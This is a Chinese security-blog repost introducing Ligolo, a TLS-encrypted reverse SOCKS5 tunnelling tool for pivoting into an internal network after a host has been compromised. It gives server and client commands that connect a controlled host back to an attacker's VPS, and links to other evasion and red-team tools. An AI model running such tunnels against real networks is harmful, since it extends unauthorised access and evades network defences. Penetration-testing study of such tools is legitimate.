服务粉丝

我们一直在努力
当前位置:首页 > 财经 >

N!Ligolo内网渗透反向隧道工具

日期: 来源:Hack分享吧收集编辑:FunnyWolf

声明:该公众号分享的安全工具和项目均来源于网络,仅供安全研究与学习之用,如用于其他用途,由使用者承担全部法律及连带责任,与工具作者和本公众号无关。


工具简介

简单轻量级的反向Socks5代理工具及端口映射工具,所有的流量使用TLS加密,其功能类似于Meterpreter中的Autoroute + Socks4a,但是更加稳定,速度更快。
TLS 1.3 加密隧道多平台 (Windows/Linux/Mac/...)多连接复用 (1 TCP连接传输所有流量)SOCKS5代理


使用场景

已获取到对方内网一台Windows/Linux/Mac主机权限且该主机可以连接互联网,此时你想要建立一个对方内网的Socks5代理或需要连接内网某个IP地址的某端口。Ligolo 可以帮助你建立代理继续进行内网渗透。


如果已控主机不能访问互联网,可以尝试用另一款工具

https://github.com/FunnyWolf/pystinger


使用方法

在你的VPS主机中执行服务端

./ligolos_linux_amd64 -p 0.0.0.0:1080

在已控制的内网主机中执行客户端.

ligoloc_windows_amd64.exe -s 192.168.1.120:443

连接建立成功后,此时VPS的127.0.0.1:1080已经建立已控主机的内网Socks5代理。


下载地址

点击下方名片进入公众号

回复关键字【230301】获取下载链接



关注公众号回复“1208”可以领取个人常用高效爆破字典,“0221”2020年酒仙桥文章打包,“1212”杀软对比源码+数据源,“0421”Windows提权工具包。


往期推荐工具

渗透测试常用的数据库综合利用工具

RequestTemplate红队内网渗透工具

Railgun - 一款GUI界面的渗透工具

GoBypass - Golang免杀生成工具

ByPassBehinder冰蝎WebShell免杀工具

SweetBabyScan内网资产探测漏扫工具

掩日 - 适用于红队的综合免杀工具

AuxTools浮鱼渗透辅助工具箱V1.0


POCbomber红队快速打点漏洞检测工具

相关阅读

  • 绕过防病毒和EDR基础技术脑图

  • 声明:该公众号分享的安全工具和项目均来源于网络,仅供安全研究与学习之用,如用于其他用途,由使用者承担全部法律及连带责任,与工具作者和本公众号无关。这个脑图列出了绕过反病毒
  • 收藏!攻击者溯源反制脑图合集

  • 声明:该公众号分享的安全工具和项目均来源于网络,仅供安全研究与学习之用,如用于其他用途,由使用者承担全部法律及连带责任,与工具作者和本公众号无关。之前收集整理的一些有关溯
  • Kali Linux安装AWVS15.4

  • AWVS是英文Acunetix Web Vulnerability Scanner的简称。它是一款红队常用的web漏洞扫描工具。通过扫描可以发现站点存在的SQL注入、XSS等漏洞。以便开发者加强系统安全。安
  • 记录一次短信轰炸漏洞挖掘

  • 声明:该公众号大部分文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。请勿利用文章内的相关技术从事非法测试
  • 【直播】【高山科学经典】地球是活的吗?

  • 活动名称:地球是活的吗?活动时间:2023年3月4日 (周六) 20:00报告嘉宾:戴民汉、田松、张薇主办单位:高山书院3月4日晚八点,“高山科学经典”直播间,邀请到了海洋化学家、中国科学
  • 一款功能强大的sqlmap tamper脚本处理工具

  • 关于SQLmap Tamper-API SQLmap Tamper-API是一款功能强大的tamper脚本处理工具,在该工具的帮助下,广大研究人员可以选择使用自己最喜欢的编程语言来编写SQLmap的tamper脚本,并
  • 订阅提示 | 漏洞安全风险通告之深度分析报告

  • 安全风险通告2.0 订 阅 提 示漏洞深度分析报告奇安信CERT成立至今已对外发布数百篇漏洞风险通告,多次率先发现Microsoft、WebLogic等知名软件和组件的高危漏洞并获得官方致谢
  • 安全日报(2023.02.28)

  • 赶紧点击上方话题进行订阅吧!报告编号:B6-2023-022899报告来源:360CERT报告作者:360CERT更新日期:2023-02-281 Security Incident|安全事件Apple NSPredicate 漏洞可导致设备被持

热门文章

  • “复活”半年后 京东拍拍二手杀入公益事业

  • 京东拍拍二手“复活”半年后,杀入公益事业,试图让企业捐的赠品、家庭闲置品变成实实在在的“爱心”。 把“闲置品”变爱心 6月12日,“益心一益·守护梦想每一步”2018年四

最新文章

  • 小田变大田 丰收在眼前

  • 长沙县青山铺镇“小田变大田”高标准农田建设项目现场。青山铺镇供图星沙时报讯(记者 杨源 通讯员 宁瑞欣)近日,在长沙县青山铺镇洪河村金山万亩粮食生产示范片,“小田变大田”
  • N!Ligolo内网渗透反向隧道工具

  • 声明:该公众号分享的安全工具和项目均来源于网络,仅供安全研究与学习之用,如用于其他用途,由使用者承担全部法律及连带责任,与工具作者和本公众号无关。工具简介简单轻量级的反向
  • 绕过防病毒和EDR基础技术脑图

  • 声明:该公众号分享的安全工具和项目均来源于网络,仅供安全研究与学习之用,如用于其他用途,由使用者承担全部法律及连带责任,与工具作者和本公众号无关。这个脑图列出了绕过反病毒
  • 2023推荐关注的几个安全技术号

  • 今天给大家推荐几个安全技术公众号,内容涵盖SRC漏洞挖掘、安全漏洞预警、安全武器库、红蓝对抗、渗透实战、漏洞分析、安全工具等干货,相信你能用的上!乌鸦安全乌鸦安全,专注于
  • 收藏!攻击者溯源反制脑图合集

  • 声明:该公众号分享的安全工具和项目均来源于网络,仅供安全研究与学习之用,如用于其他用途,由使用者承担全部法律及连带责任,与工具作者和本公众号无关。之前收集整理的一些有关溯
  • 莱阳市开展非煤露天矿山安全生产专项检查

  • 为深刻吸取内蒙古阿拉善盟露天煤矿事故教训,落实好上级领导重要指示和批示,提高企业政治站位,严格落实企业主体责任,莱阳市结合实际情况在全市矿山领域开展非煤露天矿山安全生产